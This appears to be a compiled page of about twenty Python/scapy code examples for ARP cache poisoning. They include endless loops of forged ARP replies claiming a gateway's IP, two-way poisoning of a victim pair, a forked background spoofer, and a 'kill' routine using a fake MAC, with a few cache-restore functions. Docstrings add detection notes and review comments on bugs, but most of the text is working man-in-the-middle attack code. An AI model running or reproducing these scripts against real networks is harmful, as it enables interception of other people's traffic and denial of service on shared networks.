Ejemplo n.º 1
    def run(self):
        """Thread body: keep announcing ``self.mac`` for the current victim IP.

        Victim IPs arrive on the queue ``q``. While no new item is queued, the
        same forged ARP frame (psrc = victim IP, hwsrc = ``self.mac``) is
        re-sent on every pass. A new item first triggers one "healing" frame
        that re-announces the previous victim's looked-up MAC, then either
        switches to the new IP or, if the item is ``None``, ends the loop.

        Detection note: each victim IP is advertised with ``self.mac`` rather
        than the MAC that ``self.whohas`` returned (presumably the genuine
        one), repeatedly and at a steady rate. That IP-to-MAC change is what
        ARP monitoring and switch-side ARP inspection are built to flag.
        """

        debug('ARP cache poisoning thread waiting for victims...')
        # Blocks until the first victim IP is queued.
        ip = q.get()
        debug('Acquired first victim... %s' % ip)

        # Ethernet header from self.mac to self.rmac.
        # NOTE(review): rmac is presumably the router/remote MAC - confirm.
        pe = Ether(src=self.mac, dst=self.rmac)
        # ARP 'who-has' whose sender IP and target IP are both the victim IP,
        # with self.mac as the sender hardware address.
        pa = ARP(op='who-has', hwsrc=self.mac, psrc=ip, pdst=ip, hwdst=self.rmac)

        # Remember the looked-up MAC so the mapping can be re-announced later.
        oldmac = self.whohas(ip)
        oldip = ip

        while True:
            try:
                # Non-blocking: raises Empty when no new command is waiting.
                ip = q.get_nowait()
                if oldmac is not None:
                    # Re-announce the previous victim's own MAC once before
                    # moving on; skipped when the lookup returned None.
                    debug('Healing victim %s/%s' % (oldip, oldmac))
                    pa.psrc = oldip
                    pa.hwsrc = oldmac
                    sendp(pe/pa, verbose=0)
                if ip is None:
                    # None is the stop sentinel.
                    break
                else:
                    debug('Changing victim to %s...' % ip)
                    # pa is mutated in place; pdst keeps the first victim's IP.
                    pa.psrc = ip
                    pa.hwsrc = self.mac
                    oldip = ip
                    oldmac = self.whohas(ip)
            except Empty:
                # Queue empty: no new command, so re-send the current frame.
                sendp(pe/pa, verbose=0)
                # NOTE(review): if this runs under Python 2 and poison_rate is
                # an int greater than 1, 1/self.poison_rate is 0 and the loop
                # sends without any pause - confirm poison_rate is a float.
                sleep(1/self.poison_rate)
Ejemplo n.º 2
def PoisonARPCache():
    """Send two forged ARP frames every five seconds; never returns.

    Victim A receives a frame whose ARP sender pair is
    (VICTIM_B_IP, ATTACKER_MAC); victim B receives the mirror image with
    VICTIM_A_IP. Both use op=1 (ARP request) and are unicast to the victim's
    MAC at the Ethernet layer.

    Detection note: on the wire this is a 5-second heartbeat of ARP frames in
    which two different IPs are both paired with the same sender MAC, which
    duplicate-MAC checks in ARP monitors pick up.
    """

    def forged_frame(victim_mac, victim_ip, claimed_ip):
        # Ethernet header addressed to the victim; ARP sender pair is
        # (claimed_ip, ATTACKER_MAC), ARP target IP is the victim itself.
        link = Ether(src=ATTACKER_MAC, dst=victim_mac)
        arp = ARP(hwsrc=ATTACKER_MAC, psrc=claimed_ip, pdst=victim_ip, op=1)
        return link / arp

    frames = (
        forged_frame(VICTIM_A_MAC, VICTIM_A_IP, VICTIM_B_IP),
        forged_frame(VICTIM_B_MAC, VICTIM_B_IP, VICTIM_A_IP),
    )

    while True:
        for frame in frames:
            sendp(frame)
        sleep(5)
Ejemplo n.º 3
def restore_arp_table(dst, src):
    """Re-announce the looked-up MAC of *src* to *dst* with ten ARP replies.

    This is the clean-up counterpart of a spoofing run: the reply's sender
    pair is (src, get_mac(src)), so a cache entry for *src* on *dst* is set
    back to whatever ``get_mac`` resolves.

    Args:
        dst: IP address of the host whose ARP cache entry is being corrected.
        src: IP address whose mapping is re-announced (the author's example
            value was 192.168.0.36).
    """
    # NOTE(review): get_mac is defined elsewhere; if a lookup can fail, the
    # reply would carry whatever it returns in that case - confirm.
    receiver_mac = get_mac(dst)
    owner_mac = get_mac(src)

    correction = ARP(
        op=2,  # ARP reply
        pdst=dst,
        hwdst=receiver_mac,
        psrc=src,
        hwsrc=owner_mac,
    )
    # Sent ten times, silently.
    send(correction, count=10, verbose=False)
Ejemplo n.º 4
def arp_spoof(ip_to_spoof, pretend_ip):
    """Send one ARP reply to *ip_to_spoof* pairing *pretend_ip* with a fixed MAC.

    Args:
        ip_to_spoof: IP address of the host that receives the reply; its MAC
            is resolved with ``get_mac``.
        pretend_ip: IP address placed in the sender field (the author's
            example value was 192.168.0.36).

    Detection note: the sender hardware address is the hard-coded literal
    below, so every reply this function emits carries the same MAC whatever
    IP it claims; one MAC answering for several IPs is a standard
    ARP-monitoring signal.
    """
    receiver_mac = get_mac(ip_to_spoof)

    forged_reply = ARP(
        op=2,  # ARP reply
        pdst=ip_to_spoof,
        hwdst=receiver_mac,
        hwsrc="00:0c:29:9d:e8:09",
        psrc=pretend_ip,
    )
    send(forged_reply, verbose=False)
Ejemplo n.º 5
    def __init__(self, ip, mac):
        """Pre-build the Ethernet and ARP layers that announce *ip* at *mac*.

        Nothing is sent here; the two layers are only stored on the instance
        as ``self.ether`` and ``self.arp``.

        Args:
            ip: IP address placed in the ARP sender-protocol field.
            mac: MAC used both as ARP sender hardware address and as Ethernet
                source.
        """
        # ARP "is-at" announcement whose sender pair is (ip, mac).
        announcement = ARP()
        announcement.op = announcement.is_at
        announcement.hwsrc = mac
        announcement.psrc = ip

        # Ethernet source is set explicitly; the original comment notes that
        # the default would be the network card's MAC.
        link_header = Ether()
        link_header.src = mac

        self.ether = link_header
        self.arp = announcement
Ejemplo n.º 6
 def __init__(self, ip, mac):
     """Store an Ethernet header and an ARP "is-at" layer for (*ip*, *mac*).

     The constructor only prepares the layers; no frame leaves the host
     from here. Both the Ethernet source and the ARP sender hardware
     address are set to *mac*, and the ARP sender IP to *ip*.
     """
     # Without an explicit src the default would be the network card's MAC
     # (per the original comment).
     link_header = Ether(src=mac)

     claim = ARP(psrc=ip, hwsrc=mac)
     claim.op = claim.is_at

     self.arp = claim
     self.ether = link_header
Ejemplo n.º 7
def spoof(from_ip, to_ip, spoofed_mac, hwdest=None):
    """Send one ARP packet to *to_ip* that pairs *from_ip* with *spoofed_mac*.

    The ARP operation is never set, so the packet carries whatever default
    the ARP layer uses.

    Args:
        from_ip: IP address placed in the ARP sender-protocol field (psrc).
        to_ip: IP address placed in the ARP target-protocol field (pdst).
        spoofed_mac: MAC placed in the ARP sender-hardware field (hwsrc).
        hwdest: target MAC; when falsy it is looked up with
            ``getMacAddress(to_ip)``, falling back to the broadcast address.

    Returns:
        The target MAC that was passed in or resolved, so a caller can reuse
        it on the next call.
    """
    if not hwdest:
        # Fall back to broadcast when the MAC address can't be retrieved.
        hwdest = getMacAddress(to_ip) or "ff:ff:ff:ff:ff:ff"
    packet = ARP()
    # NOTE(review): the other snippets on this page set the ARP target MAC
    # through the field `hwdst`; `hwdest` does not match that name, so this
    # value may never reach the packet - confirm against scapy's ARP fields.
    packet.hwdest = hwdest
    packet.pdst = to_ip
    packet.hwsrc = spoofed_mac
    packet.psrc = from_ip
    send(packet, verbose=0)
    return hwdest
Ejemplo n.º 8
def create_arp_packet(target, victim):
    """Build, without sending, an ARP packet that pairs *victim*'s IP with eth0's MAC.

    Args:
        target: IP address of the host whose ARP cache the packet is aimed at
            (ARP target-protocol field).
        victim: IP address placed in the ARP sender-protocol field.

    Returns:
        The ARP layer. The operation is left at the layer's default and the
        target hardware address is the broadcast MAC.
    """
    # The sender hardware address is read from the local interface; the
    # interface name 'eth0' is assumed by the original author.
    local_mac = getHwAddr('eth0')
    return ARP(
        pdst=target,
        hwsrc=local_mac,
        psrc=victim,
        hwdst="ff:ff:ff:ff:ff:ff",
    )
Ejemplo n.º 9
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
    """Send ARP packets pairing *gateway_ip* with a hard-coded MAC to each target.

    Args:
        targets: a target IP, or a collection of them (see the review note on
            the type check below).
        gateway_ip: IP address placed in the ARP sender-protocol field.
        nloop: when truthy the send round repeats forever; when falsy exactly
            one round is sent.

    Detection note: every packet advertises *gateway_ip* at the literal MAC
    2b:2b:2b:2b:2b:2b, and rounds follow each other with no delay, so the
    traffic shows up as a high-rate stream of ARP frames in which the gateway
    IP is paired with that one MAC.
    """
    # NOTE(review): this compares the argument with the `list` type object by
    # identity; it is true for every list instance, so a list argument gets
    # wrapped in a second list as well. An isinstance check looks intended.
    if targets is not list:
        targets = [targets]
    a = ARP()
    a.psrc = gateway_ip
    a.hwsrc = "2b:2b:2b:2b:2b:2b"
    a.hwdst = "ff:ff:ff:ff:ff:ff"

    while True:
        # The same ARP object is reused; only pdst changes per target.
        for target in targets:
            a.pdst = target
            send(a)
        # One round only when nloop is falsy; otherwise the loop never exits.
        if not nloop:
            break
Ejemplo n.º 10
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
    """Advertise *gateway_ip* at a fixed MAC to every entry in *targets*.

    One ARP object is built with sender pair
    (gateway_ip, 2b:2b:2b:2b:2b:2b) and the broadcast MAC as target hardware
    address; it is then sent once per target with ``pdst`` rewritten each
    time. With the default ``nloop=True`` the rounds repeat without pause and
    the function never returns.
    """
    # NOTE(review): `targets is not list` tests identity with the `list` type
    # itself, which holds for any actual list, so list arguments are nested
    # one level deeper here - confirm whether isinstance() was meant.
    if targets is not list:
        targets = [targets]
    a = ARP()
    a.psrc = gateway_ip
    # Hard-coded sender MAC: a constant that monitoring rules can match on.
    a.hwsrc = "2b:2b:2b:2b:2b:2b"
    a.hwdst = "ff:ff:ff:ff:ff:ff"

    while True:
        for target in targets:
            a.pdst = target
            send(a)
        # A falsy nloop limits the run to a single round.
        if not nloop:
            break
Ejemplo n.º 11
    def run(self):
        """Worker loop that re-sends a forged ARP frame for the queued victim IP.

        The first victim IP is taken from the queue ``q`` with a blocking
        read. After that the queue is polled without blocking: an empty queue
        means "send the current frame again and sleep"; a new IP means
        "re-announce the old victim's looked-up MAC, then switch"; ``None``
        means "re-announce and stop".

        Detection note: the forged frame pairs the victim's IP with
        ``self.mac``, and the healing frame pairs it with the MAC obtained
        from ``self.whohas``. A monitor therefore sees the mapping for one IP
        alternate between two MACs around each victim change.
        """

        debug('ARP cache poisoning thread waiting for victims...')
        # Blocking read: waits for the first victim IP.
        ip = q.get()
        debug('Acquired first victim... %s' % ip)

        # Ethernet header from self.mac to self.rmac.
        # NOTE(review): rmac is presumably the router/remote MAC - confirm.
        pe = Ether(src=self.mac, dst=self.rmac)
        # ARP 'who-has' with sender IP == target IP == victim IP and
        # self.mac as sender hardware address.
        pa = ARP(op='who-has',
                 hwsrc=self.mac,
                 psrc=ip,
                 pdst=ip,
                 hwdst=self.rmac)

        # Looked-up MAC of the victim, kept for the later healing frame.
        oldmac = self.whohas(ip)
        oldip = ip

        while True:
            try:
                # Raises Empty when nothing new has been queued.
                ip = q.get_nowait()
                if oldmac is not None:
                    # Put the previous victim's own pair back on the wire once.
                    debug('Healing victim %s/%s' % (oldip, oldmac))
                    pa.psrc = oldip
                    pa.hwsrc = oldmac
                    sendp(pe / pa, verbose=0)
                if ip is None:
                    # None is the stop sentinel.
                    break
                else:
                    debug('Changing victim to %s...' % ip)
                    # pa is reused; pdst still holds the first victim's IP.
                    pa.psrc = ip
                    pa.hwsrc = self.mac
                    oldip = ip
                    oldmac = self.whohas(ip)
            except Empty:
                # Nothing queued: send the current forged frame again.
                debug('Poisoning %s...' % ip)
                sendp(pe / pa, verbose=0)
                # NOTE(review): with Python 2 integer division an int
                # poison_rate above 1 makes this sleep(0) - confirm the type.
                sleep(1 / self.poison_rate)
Ejemplo n.º 12
def arp_attack():
    """Send the same forged ARP reply in an endless loop, printing after each send.

    The reply's sender pair is (get_gate_way(), get_mac_address()) and its
    target IP is get_broadcast(); all three helpers are defined elsewhere.
    There is no delay between sends and no exit condition.

    Detection note: a continuous, unthrottled stream of ARP replies for the
    gateway address from a single sender is visible as an ARP rate spike as
    well as an IP-to-MAC change.
    """
    forged_reply = ARP()

    # Sender IP, target IP and sender MAC come from the three helpers, called
    # in the same order as before.
    forged_reply.psrc = get_gate_way()
    forged_reply.pdst = get_broadcast()
    forged_reply.hwsrc = get_mac_address()
    forged_reply.op = 2  # ARP reply

    while True:
        send(forged_reply)
        print('arp send')
Ejemplo n.º 13
def arp_attack():
    """Loop forever sending one ARP reply that claims the gateway's IP.

    The packet is built once: op 2 (reply), sender IP from ``get_gate_way()``,
    target IP from ``get_broadcast()``, sender MAC from ``get_mac_address()``.
    It is then re-sent back to back, with a line printed per send.
    """
    gateway_ip = get_gate_way()
    broadcast_ip = get_broadcast()
    sender_mac = get_mac_address()

    reply = ARP(op=2, psrc=gateway_ip, pdst=broadcast_ip, hwsrc=sender_mac)

    # No sleep and no exit condition: the send rate is bounded only by send().
    while True:
        send(reply)
        print('arp sent')
Ejemplo n.º 14
def arpspoof_via_scapy(impersonated_host, victim_ip):
    """Fork a child process that keeps sending ARP replies for *impersonated_host*.

    The parent logs the child's pid, appends it to
    ``ml.child_pids_to_shutdown`` and returns. The child builds one ARP reply
    pairing *impersonated_host* with ``ml.my_mac`` and sends it every 3
    seconds without ever leaving the loop.

    Args:
        impersonated_host: IP address placed in the ARP sender-protocol field.
        victim_ip: only used by the unicast branch, which is disabled by the
            hard-wired ``non_broadcast = 0``.

    Detection note: with the broadcast branch active, every host on the
    segment receives a reply for *impersonated_host* from ``ml.my_mac`` at a
    fixed 3-second interval.
    """
    # IP, srp and sr1 are imported but not referenced in this function.
    from scapy.all import ARP, IP, send, srp, sr1, conf

    # Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
    # corrective ARP replies.
    ml.arpspoof_via_scapy = 1

    pid = os.fork()
    if pid:
        # Parent: pid is the child's process id.
        ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
        # Let's add this process to a list of child processes that we will need to
        # explicitly shut down.

        ml.child_pids_to_shutdown.append(pid)

    else:
        # Child: silence scapy's per-packet output.
        conf.verb = 0

        # Build an ARP response to set up spoofing
        arp_response = ARP()
        # define a constant for ARP responses
        const_ARP_RESPONSE = 2
        # Set the type to a ARP response
        arp_response.op = const_ARP_RESPONSE
        # Hardware address the reply claims as sender
        arp_response.hwsrc = ml.my_mac
        # IP address we want to map to that address
        arp_response.psrc = impersonated_host

        # Now set the ARP response target. The flag is a constant, so only
        # the broadcast branch below ever runs.
        non_broadcast = 0
        if non_broadcast:

            # MAC address and IP address of our victim
            arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
            arp_response.pdst = victim_ip
        else:
            arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
            arp_response.pdst = ml.my_broadcast

        # Issue the ARP response every 3 seconds (the sleep below; the
        # original comment said 5).
        while (1):
            send(arp_response)
            sleep(3)

        # Unreachable: the loop above has no break. `exit` is also a bare
        # name here, not a call, so it would not terminate the child.
        print "Arpspoofing dying"
        exit
Ejemplo n.º 15
def arpspoof_via_scapy(impersonated_host, victim_ip):
    """Start a forked child that broadcasts ARP replies for *impersonated_host*.

    Parent side: sets ``ml.arpspoof_via_scapy``, records the child's pid in
    ``ml.child_pids_to_shutdown`` and returns. Child side: sends an ARP reply
    (op 2) pairing *impersonated_host* with ``ml.my_mac`` every 3 seconds and
    never returns. *victim_ip* is only read by the unicast branch, which the
    constant ``unicast_to_victim = 0`` keeps disabled.

    Detection note: the child's traffic is a broadcast ARP reply for one IP
    on a fixed 3-second cadence, a regular pattern that ARP monitors can key
    on alongside the IP-to-MAC change itself.
    """
    from scapy.all import ARP,IP,send,srp,sr1,conf

    # Tells the shutdown code that scapy was used, so it knows corrective ARP
    # replies have to be sent.
    ml.arpspoof_via_scapy = 1

    child_pid = os.fork()
    if child_pid:
        # Parent: remember the child so it can be shut down explicitly.
        ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % child_pid)
        ml.child_pids_to_shutdown.append(child_pid)
        return

    # ---- child process from here on ----
    conf.verb = 0  # silence scapy's own output

    reply = ARP()
    reply.op = 2  # ARP reply
    reply.hwsrc = ml.my_mac
    reply.psrc = impersonated_host

    # Constant switch: 0 selects the broadcast target below.
    unicast_to_victim = 0
    if unicast_to_victim:
        reply.hwdst = lookup_mac_via_scapy(victim_ip)
        reply.pdst = victim_ip
    else:
        reply.hwdst = "ff:ff:ff:ff:ff:ff"
        reply.pdst = ml.my_broadcast

    # One reply every 3 seconds; the loop has no exit.
    while True:
        send(reply)
        sleep(3)

    # Unreachable, kept from the original; `exit` is a bare name, not a call.
    print("Arpspoofing dying")
    exit
Ejemplo n.º 16
def sendPackets(gateway_ip, target_ip, this_mac_address, target_mac_address):
    """Send one ARP reply to the target pairing *gateway_ip* with *this_mac_address*.

    Despite the name of the original inner helper (``broadcast``), the frame
    is unicast: both the Ethernet destination and the ARP target hardware
    address are *target_mac_address*.

    Args:
        gateway_ip: IP address placed in the ARP sender-protocol field.
        target_ip: IP address of the receiving host (ARP target-protocol field).
        this_mac_address: MAC used as Ethernet source and ARP sender hardware
            address.
        target_mac_address: MAC of the receiving host.
    """
    link_header = Ether(src=this_mac_address, dst=target_mac_address)
    forged_reply = ARP(
        op=2,  # ARP reply
        psrc=gateway_ip,
        hwsrc=this_mac_address,
        pdst=target_ip,
        hwdst=target_mac_address,
    )
    # verbose=True keeps scapy's send summary on stdout.
    sendp(x=link_header / forged_reply, verbose=True)
Ejemplo n.º 17
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
    """Send a single unicast ARP reply that pairs *gateway_ip* with *my_mac*.

    Args:
        my_mac: MAC used as Ethernet source and ARP sender hardware address.
        gateway_ip: IP address placed in the ARP sender-protocol field.
        target_ip: IP address of the receiving host.
        target_mac: MAC of the receiving host (Ethernet destination and ARP
            target hardware address).

    Detection note: the receiver gets an ARP reply it did not ask for, in
    which the gateway's IP is paired with *my_mac*; unsolicited replies for
    the gateway address are a common alerting condition.
    """
    # Layer 2: straight to the target, sourced from my_mac.
    frame = Ether()
    frame.src = my_mac
    frame.dst = target_mac

    # Layer ARP: reply (op 2) with sender pair (gateway_ip, my_mac).
    reply = ARP()
    reply.op = 2
    reply.psrc = gateway_ip
    reply.hwsrc = my_mac
    reply.pdst = target_ip
    reply.hwdst = target_mac

    sendp(x=frame / reply, verbose=False)
Ejemplo n.º 18
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
    """Emit one ARP reply to *target_mac* claiming *gateway_ip* is at *my_mac*.

    The frame is built from two layers: an Ethernet header
    (my_mac -> target_mac) and an ARP reply whose sender pair is
    (gateway_ip, my_mac) and whose target pair is (target_ip, target_mac).
    It is sent once, with scapy's output suppressed.
    """
    link_header = Ether(src=my_mac, dst=target_mac)
    forged_reply = ARP(
        psrc=gateway_ip,
        hwsrc=my_mac,
        pdst=target_ip,
        hwdst=target_mac,
        op=2,  # ARP reply
    )
    sendp(x=link_header / forged_reply, verbose=False)
Ejemplo n.º 19
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
    """Send one forged ARP reply built from the given addresses.

    The reply tells the host at (*target_ip*, *target_mac*) that *gateway_ip*
    is reachable at *my_mac*. The same MAC is used as Ethernet source.

    Detection note: the Ethernet source and the ARP sender hardware address
    match here, so a source-MAC consistency check alone will not flag the
    frame; the signal is the gateway IP appearing with a new MAC.
    """
    # ARP layer: op 2 = reply, sender pair (gateway_ip, my_mac).
    arp_fields = {
        "op": 2,
        "psrc": gateway_ip,
        "hwsrc": my_mac,
        "pdst": target_ip,
        "hwdst": target_mac,
    }
    packet = Ether(src=my_mac, dst=target_mac) / ARP(**arp_fields)

    sendp(x=packet, verbose=False)
Ejemplo n.º 20
        exit(0)

    # Command-line arguments: target host IP, then gateway IP.
    poor_client_ip = sys.argv[1]
    # NOTE(review): gateway_ip is read here but the live packet below
    # hard-codes psrc='192.168.43.1'; only the disabled variant inside the
    # string literal uses gateway_ip - confirm which one is intended.
    gateway_ip = sys.argv[2]
    # Hard-coded sender MAC used in every packet this script emits.
    my_hardware = '11:11:11:11:11:11'

    # Build arp packages
    #
    # attacker > poor_client
    # The triple-quoted block below is an inert string expression; the author
    # used it to disable the earlier 'who-has' variant.
    """
    arp_poor_client = ARP(op='who-has')

    arp_poor_client.psrc = gateway_ip
    arp_poor_client.hwsrc = my_hardware

    arp_poor_client.pdst = poor_client_ip
    arp_poor_client.hwdst = 'ff:ff:ff:ff:ff:ff'
    """
    # Live variant: ARP 'is-at' (reply) with sender pair
    # ('192.168.43.1', my_hardware), addressed to poor_client_ip with the
    # broadcast MAC as target hardware address.
    arp_poor_client = ARP(op='is-at')

    arp_poor_client.psrc = '192.168.43.1'
    arp_poor_client.hwsrc = my_hardware

    arp_poor_client.pdst = poor_client_ip
    arp_poor_client.hwdst = 'ff:ff:ff:ff:ff:ff'

    # One reply per second with no exit condition: a once-per-second
    # unsolicited reply is the on-wire pattern a monitor would see.
    while (1):
        send(arp_poor_client)

        sleep(1)
Ejemplo n.º 21
#!/usr/bin/python

import sys
from scapy.all import ARP,send
# Earlier, targeted field values kept by the author (disabled):
#a.psrc="192.168.1.93"
#a.hwdst="d4:be:d9:dc:4c:20"
#a.pdst="192.168.1.12"
#a.hwdst="00:00:00:00:00:00"
#a.pdst="0.0.0.0"

# Single ARP packet with a fixed sender MAC, sender IP 0.0.0.0, broadcast
# target MAC and target IP 255.255.255.255; the operation is left at the ARP
# layer's default. A sender IP of 0.0.0.0 paired with a constant MAC makes the
# frame easy to match in a capture filter.
a = ARP(
    hwsrc="aa:aa:aa:aa:aa:aa",
    psrc="0.0.0.0",
    hwdst="ff:ff:ff:ff:ff:ff",
    pdst="255.255.255.255",
)
send(a)